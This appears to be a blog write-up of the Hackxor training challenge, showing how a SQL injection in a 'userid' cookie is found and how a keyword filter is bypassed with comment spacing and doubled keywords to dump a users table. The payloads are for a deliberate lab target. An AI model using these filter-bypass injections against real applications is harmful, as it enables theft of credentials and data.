Hackxor SQL Injection

You can download the complete challenge VM from here. They have provided the online version of first two levels. I was interested in having a look at it. http://cloaknet.csc.kth.se:8080/proxy.jsp

There is a login page and our goal is to extract all the usernames and passwords from the database.

If you try injecting the login form, none of the injections would work. But there was this text called “No account?” when you click it you get this message.

After logging with demo:demo we are taken to “proxypanel.jsp” which displays source, target and date.



Let’s analyze this using Burp. At first when we login this is POST request. Notice that this request is being made to “proxy.jsp” page.

user=demo&pass=demo&login=1
&token=17312256995467290477108424856116888064446348101932685808552243140
&asd=Login

Too bad the web app is using tokens, this means we cannot repeat the request to experiment.

After forwarding the request another GET request is being made to “proxypanel.jsp” the actual page where we land. In here the cookie values are being passed.

Let’s have a look at the cookies.

There are two session cookies, JESSIONID and userid. Let’s mutate the userid parameter and check the output. userid=71934”\\;

Aha!

com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near '''''' at line 1

After counting the columns I got 3 columns. You cannot just inject in here, because there is a filter. From what I noticed keywords such as union, select and spaces are being filtered. For bypassing spaces I just used comments /**/ and for bypassing keywords such as union and select I used UNunionION and SELselectECT. However when I tried giving 1,2,3 I get the error “The used SELECT statements have a different number of columns”

Our target is to dump the usernames and passwords, but the userid should be column name from a different table. I just guessed there should be table as “users” and tried this query.

-71934/**/unUNIONion/**/seSELECTlect/**/*/**/from/**/users

w00t! Here we go 🙂

Thanks for reading.

Advertisements

3 thoughts on “Hackxor SQL Injection

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s